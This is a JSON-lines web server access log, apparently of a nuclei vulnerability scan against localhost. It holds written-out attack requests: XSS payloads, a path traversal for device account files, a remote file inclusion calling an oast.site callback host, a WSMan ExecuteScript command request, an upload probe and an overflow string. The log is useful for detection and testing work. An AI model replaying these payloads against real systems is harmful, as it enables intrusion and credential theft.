"18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup/index.php?page=servers&mode=test&id=\x22>'> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"\x0D\x0A \x0D\x0A HTTP://127.0.0.1/wsman/\x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\x0D\x0A \x0D\x0A http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous\x0D\x0A \x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript\x0D\x0A 102400\x0D\x0A uuid:00B60932-CC01-0005-0000-000000010000\x0D\x0A PT1M30S\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A root/scx\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A aWQ=\x0D\x0A \x0D\x0A 0\x0D\x0A true\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wsman HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/pbootcms.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error3?msg=30&data=';alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /svnserve.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample-apps/hello/%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A10485760\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x2229K9NHg1xa1jrW64Oxs6wrwkKM3.svg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------92633278134516118923780781161--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hedwig.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/krgourl.php?DOCUMENT_ROOT=http://ca281d8smpvb9r2g07h0txjtyphb67nmn.oast.site HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/english/index.html?javascript& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA